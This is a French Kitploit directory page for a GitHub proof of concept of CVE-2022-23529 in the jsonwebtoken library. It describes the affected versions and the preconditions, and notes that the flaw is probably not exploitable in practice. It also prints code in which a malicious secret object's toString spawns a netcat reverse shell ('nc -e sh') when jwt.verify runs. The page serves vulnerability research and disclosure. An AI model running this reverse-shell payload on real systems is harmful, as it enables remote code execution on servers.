Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-23529-Exploration — Preuve de concept d'exploitation pour CVE-2022-23529, démontrant une exécution de code à distance (RCE) dans des bibliothèques JWT vulnérables via des objets de secret HMAC malveillants. | Kitploit
Outils/GitHubGitHub/daniel-marchi/cve-2022-23529-exploration
Analyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubdaniel-marchi/cve-2022-23529-exploration

CVE-2022-23529-Exploration

Preuve de concept d'exploitation pour CVE-2022-23529, démontrant une exécution de code à distance (RCE) dans des bibliothèques JWT vulnérables via des objets de secret HMAC malveillants.

Voir le dépôt
il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-23529

Les versions de la bibliothèque JSON Web Token (JWT) antérieures à 3.4.6, 4.0.4 et 4.1.5 sont vulnérables à une exécution de code à distance (RCE).

Les fonctions de hachage HMAC acceptent n'importe quelle chaîne en entrée, ce qui conduit à une RCE.

En raison des conditions préalables, cette vulnérabilité n'est probablement pas exploitable.

Pour exploiter cette vulnérabilité, un attaquant devrait satisfaire l'une des conditions suivantes :

  • Le serveur ne stocke pas les clés secrètes de manière sécurisée.
  • L'attaquant doit avoir accès aux clés secrètes et les contrôler.

npm install [email protected]

var jwt = require('jsonwebtoken');

créer un jeton en utilisant le secret du serveur

var token = jwt.sign({"x":"y"}, 'servers_secret');

créer un objet malveillant contenant un reverse shell (node.js)

root@kitploit:~
var poisoned_secret_on_server = { 
    toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
        process.on('exit', ()=> {
            require('child_process').exec('nc -e sh 127.0.0.1 9001');
        });
        process.exit(0)
    }
}

le serveur vérifie le jeton en utilisant l'objet malveillant stocké comme secret

jwt.verify(token, poisoned_secret_on_server);

Télécharger l’outil